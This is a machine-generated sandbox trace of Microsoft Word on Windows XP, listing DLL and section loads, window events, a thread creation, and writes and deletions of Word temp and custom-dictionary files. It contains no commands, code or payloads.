    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc Offset: none Length: 54 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 494305304
    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc Offset: none Length: 108 Value: 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 494306548
    Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 494332243
    Section loaded Path: \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 14F0000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 494377832
    Section loaded Path: \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1500000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 494380322
    Window created Window Name: _WwB Class Name: _WwB success 494389102
    Window created Window Name: _WwG Class Name: _WwG success 494395128
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 494398455
    Window created Window Name: _WwC Class Name: _WwC success 494400283
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 494644714
    Window created Window Name: _WwC Class Name: _WwC success 494760182
    Window created Window Name: _WwC Class Name: _WwC success 494761352
    Window created Window Name: _WwC Class Name: _WwC success 494762879
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1560000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 494837280
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19531106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1560000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 494838290
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 1580000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 494841728
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 494848792
    Section loaded Path: \BaseNamedObjects\Global\RotHintTable Access: read Type: unknown Baseaddress: 1580000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 494862047
    Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 1590000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 494863690
    Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: 1590000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 494865152
    Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 1590000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 494865829
    Message posted HWND: 10176 Message: 45F WParam: 0 LParam: 0 success 494896024
    Windows enumerated Desktop: 0 Parent: 4004A Enum Children: true TID: 0 HWNDs: 30050, 30052, 30054, 30064, 10066, 10068, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 494899691
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 494901769
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 494902024
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 494902285
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 494902404
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 494902525
    Section loaded Path: \KnownDlls\SXS.DLL Access: write and read and execute Type: unknown Baseaddress: 1590000 Size: 2904064 Protection: read write Mapped to pid: own pid object name not found 495049322
    Section loaded Path: C:\WINDOWS\system32\sxs.dll Access: query and write and read and execute Type: image Baseaddress: 7E720000 Size: 720896 Protection: read write Mapped to pid: own pid success or wait 495050004
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070106
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070342
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070514
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070699
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 495070926
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1A80000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 495085781
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 495095091
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 495095220
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 495095348
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 1AA0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 495097612
    Message posted HWND: 101B8 Message: 402 WParam: 0 LParam: 0 success 495135653
    Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 1AA0000 Size: 159744 Protection: execute Mapped to pid: own pid object name not found 495156145
    Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 495156908
    Section loaded Path: \KnownDlls\LINKINFO.dll Access: write and read and execute Type: unknown Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid object name not found 495240588
    Section loaded Path: C:\WINDOWS\system32\linkinfo.dll Access: query and write and read and execute Type: image Baseaddress: 76980000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 495241214
    Section loaded Path: \KnownDlls\ntshrui.dll Access: write and read and execute Type: unknown Baseaddress: 76980000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 495297659
    Section loaded Path: C:\WINDOWS\system32\ntshrui.dll Access: query and write and read and execute Type: image Baseaddress: 76990000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 495299280
    Section loaded Path: \KnownDlls\ATL.DLL Access: write and read and execute Type: unknown Baseaddress: 76990000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 495303527
    Section loaded Path: C:\WINDOWS\system32\atl.dll Access: query and write and read and execute Type: image Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 495304230
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 495321818
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 495322515
    Section loaded Path: C:\WINDOWS\system32\ntshrui.dll Access: read Type: commit Baseaddress: 1AB0000 Size: 143360 Protection: readonly Mapped to pid: own pid success or wait 495345293
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 495396506
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497070083
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497074691
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497082052
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497285876
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497311159
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497320229
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497322467
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB..JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498796180
    Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.AJH Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AF0000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 498797414
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.B.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498797831
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.C.JOJAC Access: query and write and read Type: commit Baseaddress: 1AD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498798188
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.D.JOJAC Access: query and write and read Type: commit Baseaddress: 1B70000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498798532
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.E.JOJAC Access: query and write and read Type: commit Baseaddress: 1B80000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498798871
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.F.JOJAC Access: query and write and read Type: commit Baseaddress: 1B90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498799216
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.G.JOJAC Access: query and write and read Type: commit Baseaddress: 1BA0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498799560
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.H.JOJAC Access: query and write and read Type: commit Baseaddress: 1BB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498799906
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.I.JOJAC Access: query and write and read Type: commit Baseaddress: 1BC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498800254
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.J.JOJAC Access: query and write and read Type: commit Baseaddress: 1BD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498800603
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.K.JOJAC Access: query and write and read Type: commit Baseaddress: 1BE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498800953
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.L.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498802348
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.M.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498804301
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.N.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498805641
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.O.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498807051
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.P.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498808408
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498809764
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498811172
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498812528
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498813922
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498815330
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.O.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498817329
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.P.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498817717
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498818044
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498818366
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.CB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498818689
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.DB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819012
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.EB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819334
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.FB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819657
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.GB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819979
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.HB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498820576
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FB.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499524699
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GB.ELKAC Access: query and write and read Type: commit Baseaddress: 1AD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499525056
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HB.ELKAC Access: query and write and read Type: commit Baseaddress: 1B70000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499525406
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IB.ELKAC Access: query and write and read Type: commit Baseaddress: 1B80000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499525750
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.JB.ELKAC Access: query and write and read Type: commit Baseaddress: 1B90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499526093
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.KB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BA0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499526437
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.LB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499526780
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.MB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499527122
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.NB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499527468
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.OB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499527820
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.PB.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499529307
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499531175
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499532514
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499533861
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499535267
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499536619
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499537967
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499539380
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499540737
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499542087
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.IB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499544438
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.JB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499544857
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.KB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499545214
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.LB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499545709
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.MB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499546053
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.NB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499546698
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.OB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499547036
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.PB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499547361
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AC.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499547683
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BC.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499548254
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL Access: write and read and execute Type: commit Baseaddress: 1AC0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 501803665
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL Access: query and write and read and execute Type: image Baseaddress: 37320000 Size: 135168 Protection: read write Mapped to pid: own pid success or wait 501807913
    Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 37320000 Size: 135168 Protection: read write Mapped to pid: own pid object name not found 501819004
    Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 501820517
    Section loaded Path: \KnownDlls\OLEACC.dll Access: write and read and execute Type: unknown Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid object name not found 501827877
    Section loaded Path: C:\WINDOWS\system32\oleacc.dll Access: query and write and read and execute Type: image Baseaddress: 74C80000 Size: 180224 Protection: read write Mapped to pid: own pid success or wait 501829798
    Section loaded Path: \KnownDlls\MSVCP60.dll Access: write and read and execute Type: unknown Baseaddress: 74C80000 Size: 180224 Protection: read write Mapped to pid: own pid object name not found 501837133
    Section loaded Path: C:\WINDOWS\system32\msvcp60.dll Access: query and write and read and execute Type: image Baseaddress: 76080000 Size: 413696 Protection: read write Mapped to pid: own pid success or wait 501838814
    Section loaded Path: C:\WINDOWS\system32\oleaccrc.dll Access: query and read Type: commit Baseaddress: 1AD0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 501860487
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL Access: query and read Type: commit Baseaddress: 1C70000 Size: 49152 Protection: readonly Mapped to pid: own pid success or wait 501911842
    Section loaded Path: C:\WINDOWS\system32\stdole2.tlb Access: query and read Type: commit Baseaddress: 1C80000 Size: 16384 Protection: readonly Mapped to pid: own pid success or wait 501928970
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL Access: write and read and execute Type: commit Baseaddress: 1C90000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 501937238
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL Access: query and write and read and execute Type: image Baseaddress: 374B0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 501941219
    Thread created PID: 296 TID: 1800 EIP: 7C8106F9 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Injected: false success or wait 502433527
    Thread resumed TID: 1800 PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 502433804
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL Access: write and read and execute Type: commit Baseaddress: 1EA0000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 503173981
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL Access: query and write and read and execute Type: image Baseaddress: 3F000000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 503178230
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSP3EN.LEX Access: query and read Type: commit Baseaddress: 1EB0000 Size: 364544 Protection: readonly Mapped to pid: own pid success or wait 505429842
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL Access: write and read and execute Type: commit Baseaddress: 1F10000 Size: 536576 Protection: execute Mapped to pid: own pid success or wait 505439243
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL Access: query and write and read and execute Type: image Baseaddress: 507C0000 Size: 540672 Protection: read write Mapped to pid: own pid success or wait 505443992
    Section loaded Path: \BaseNamedObjects\DfSharedHeap33678 Access: query and write and read Type: reserve Baseaddress: 2320000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 505647734
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505649701
    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 505651821
    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 08 00 00 00 02 00 48 00 42 00 00 00 61 00 00 00 09 00 00 00 0F 00 00 00 05 00 00 00 16 00 00 00 09 00 00 00 01 00 1C 2E D3 00 04 A4 2E D3 00 02 FC 2E D3 00 09 54 FC 8C 00 01 A0 FC 8C 00 08 FC FD 8C 00 0D success or wait 505652294
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505655606
    File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 505656739
    File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505658171
    File moved New path: unknown Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0000 success or wait 505659753
    Section loaded Path: \BaseNamedObjects\DfSharedHeap3369A Access: query and write and read Type: reserve Baseaddress: 2320000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 505660748
    Section loaded Path: \BaseNamedObjects\DfSharedHeap336AD Access: query and write and read Type: reserve Baseaddress: 2320000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 505665712
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505667699
    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 505669501
